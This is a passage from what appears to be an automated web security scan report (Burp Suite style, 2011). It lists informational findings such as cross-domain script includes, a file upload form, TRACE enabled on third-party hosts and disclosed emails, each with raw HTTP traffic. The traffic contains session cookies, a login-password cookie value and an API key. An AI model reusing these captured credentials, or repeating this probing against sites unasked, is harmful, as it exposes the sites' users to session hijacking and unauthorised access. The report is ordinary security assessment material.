<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...
24.102. http://www.stillsecure.com/library/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /library/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /library/ HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=request-a-trial&product=VAM
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.3.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:03 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14674

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Network security software</title>
<style
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...
24.103. http://www.stillsecure.com/m/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /m/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /m/?c=request-a-trial&product=VAM HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/vam/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.2.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:57:19 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 16384

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...
24.104. http://www.stillsecure.com/products.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /products.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products.php HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/services/index.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.6.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:08 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19618

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Network Security Products | Secure Networ
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...
24.105. http://www.stillsecure.com/services/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /services/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /services/index.php HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/company/testimonials.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.5.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:06 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21606

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Managed Security Services | Monitoring |
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...
24.106. http://www.stillsecure.com/vam/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /vam/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /vam/ HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.1.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:57:10 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 22159

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Vulnerability Management System | Network
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...
24.107. http://www.tresware.com/Static-contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /Static-contact.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Static-contact.html HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/webcontentmanagementNJ.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: igyi[s]=885141303733914696; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733993

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:20:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303734004; expires=Mon, 25-Apr-2011 12:30:04 GMT; path=/
Content-Type: text/html
Content-Length: 23772

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Tresware Contact Us | Web Development | Web Design, Managed Web Hosting |
...[SNIP]...
<td class="pn-normal" style="padding: 4px 4px 0px 18px;"><script src="http://maps.google.com/?file=api&amp;v=2&amp;key=ABQIAAAAa9ZgLcup1atRScDnQZtsDxSRUe5SW-hZPzm6ZYpOuWXDOrFWMxRZ7jZ--8AFfSi7D6c-kDHI8ZVQ7g" type="text/javascript"></script>
...[SNIP]...
24.108. http://www.trust-guard.com/PCI-scanning-s/39.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trust-guard.com
Path:   /PCI-scanning-s/39.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /PCI-scanning-s/39.htm HTTP/1.1
Host: www.trust-guard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:29:13 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=l47skohjorenr7a3efph75kgb0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37052

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>PCI
...[SNIP]...
<p align="center"><script type="text/javascript" src="http://widgets.clearspring.com/o/4805fc0db4a3562c/4964e05e891364a1/4805fc0dd0e7439/aa0abf66/-cpid/b0e6c9ad82f556c1/autostart/false/widget.js"></script>
...[SNIP]...
24.109. http://www.trust-guard.com/contact-trust-guard-s/4.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trust-guard.com
Path:   /contact-trust-guard-s/4.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact-trust-guard-s/4.htm HTTP/1.1
Host: www.trust-guard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=53j8cu4bh6ab8gf50molua90i4; __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; __utmc=147269874; __utmb=147269874.3.10.1303758698

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:19:56 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Trus
...[SNIP]...
<!-- Business.com Conversion Tracking Code for "Business.com Contact US page" -->
<script language="JavaScript" src="http://roi.business.com/crm/js/conversion.js"></script>
...[SNIP]...
25. File upload functionality  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /index.php

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

POST /index.php HTTP/1.1
Referer: https://support.trust-guard.com/index.php?_m=tickets&_a=submit
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand; SWIFT_loginpassword=DErwC5IL14LhnSqA7IFm011b3Yjo0HD7Sizs0xht1wo%3D
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 73

_a=submit&_m=tickets&departmentid=4&reset=Reset&step=1&submit=Next+%c2%bb

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:59:20 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16389


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta
...[SNIP]...
<span class="smalltext"><input type="file" name="opt_file[0]" value="" size="35" class="swifttext" /></span>
...[SNIP]...
26. TRACE method is enabled  previous  next
There are 18 instances of this issue:

26.1. http://d1.openx.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /

Request

TRACE / HTTP/1.0
Host: d1.openx.org
Cookie: c277c1d6c6b0a03e

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:07:21 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: d1.openx.org
Cookie: c277c1d6c6b0a03e
X-Forwarded-For: 173.193.214.243

26.2. http://games.webalta.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.webalta.ru
Path:   /

Request

TRACE / HTTP/1.0
Host: games.webalta.ru
Cookie: 7541cd9cdcfad52d

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:22:23 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: games.webalta.ru
Cookie: 7541cd9cdcfad52d

26.3. http://pixel.fetchback.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: 8fd68d4270760e27

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:13:58 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: 8fd68d4270760e27

26.4. http://pixel.rubiconproject.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 92a50ef8257487f1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:14:07 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 92a50ef8257487f1
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

26.5. http://pl.yumenetworks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pl.yumenetworks.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pl.yumenetworks.com
Cookie: 642a0b605693030e

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:53:48 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.7a DAV/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pl.yumenetworks.com
Cookie: 642a0b605693030e
X-Forwarded-For: 173.193.214.243

26.6. http://playaudiomessage.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://playaudiomessage.com
Path:   /

Request

TRACE / HTTP/1.0
Host: playaudiomessage.com
Cookie: 58fcdb2d7162ed47

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 25 Apr 2011 19:53:56 GMT
ServerID: 52
P3P: "CP=\"IDC CSP DOR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\""
Content-Type: message/http
Content-Length: 74

TRACE / HTTP/1.0
Host: playaudiomessage.com
Cookie: 58fcdb2d7162ed47

26.7. http://player.vimeo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://player.vimeo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: player.vimeo.com
Cookie: f79c53b29be77bc5

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:03:32 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: player.vimeo.com
Cookie: f79c53b29be77bc5
X-Jabodo-For: 173.193.214.243

26.8. https://store.manageengine.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.manageengine.com
Path:   /

Request

TRACE / HTTP/1.0
Host: store.manageengine.com
Cookie: ed6a06f146e1b0da

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:45 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: store.manageengine.com
Cookie: ed6a06f146e1b0da

26.9. http://widgets.digg.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /

Request

TRACE / HTTP/1.0
Host: widgets.digg.com
Cookie: 3c84da3aceb8a596

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:07:30 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
X-CDN: Cotendo
Connection: close

TRACE / HTTP/1.1
Cookie: 3c84da3aceb8a596
Accept-Encoding: gzip
Connection: Keep-Alive
Host: w.digg.com
x-cdn: Requested by Cotendo
X-Forwarded-For: 173.193.214.243, 208.93.140.33
x-chpd-loop: 1
Via: 1.0 PXY020-ASHB.COTENDO.NET (chpd/3
...[SNIP]...
26.10. http://www.igotyourindex.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igotyourindex.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.igotyourindex.com
Cookie: 14e0a6e706526fca

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:25 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.igotyourindex.com
Cookie: 14e0a6e706526fca

26.11. http://www.instantengage.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.instantengage.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.instantengage.com
Cookie: 4db68a8f5cc60cb2

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:46:00 GMT
Server: Apache/2.0.50 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.instantengage.com
Cookie: 4db68a8f5cc60cb2

26.12. http://www.integritydefender.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.integritydefender.com
Cookie: d177e08fe5f7feba

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:44:59 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.integritydefender.com
Cookie: d177e08fe5f7feba

26.13. http://www.kayako.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kayako.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.kayako.com
Cookie: 27ed62598ef5400e

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:40:53 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.kayako.com
Cookie: 27ed62598ef5400e

26.14. https://www.manageengine.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.manageengine.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.manageengine.com
Cookie: d1f59eb3c7958e9b

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:52 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.manageengine.com
Cookie: d1f59eb3c7958e9b

26.15. http://www.reputationprofessor.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reputationprofessor.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.reputationprofessor.com
Cookie: 1265e6cebb5be515

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:04:01 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7e mod_auth_pgsql/2.0.3
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.reputationprofessor.com
Cookie: 1265e6cebb5be515

26.16. http://www.smpone.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.smpone.com
Cookie: 7fd91fd5f1b454f7

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.smpone.com
Cookie: 7fd91fd5f1b454f7

26.17. http://www.stillsecure.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.stillsecure.com
Cookie: d8bd4fcc0d246f51

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:57:11 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.stillsecure.com
Cookie: d8bd4fcc0d246f51

26.18. http://www.tresware.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tresware.com
Cookie: e820d3df4b13e88f

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tresware.com
Cookie: e820d3df4b13e88f

27. Email addresses disclosed  previous  next
There are 74 instances of this issue:

27.1. http://api.flickr.com/services/feeds/photos_public.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.flickr.com
Path:   /services/feeds/photos_public.gne

Issue detail

The following email address was disclosed in the response:

Request

GET /services/feeds/photos_public.gne?id=35898586@N08&lang=en-us&format=json&jsoncallback=jsonp1303758888918 HTTP/1.1
Host: api.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.kayako.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=9ofvlfh6qmjsk&b=3&s=5t; fldetectedlang=en-us; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:41:31 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 09 Mar 2011 01:14:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, private
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-Served-By: www100.flickr.mud.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 15583

jsonp1303758888918({
       "title": "Uploads from kayako.com",
       "link": "http://www.flickr.com/photos/kayakocom/",
       "description": "",
       "modified": "2011-03-09T01:14:03Z",
       "generator": "http://www.fl
...[SNIP]...
<\/p> ",
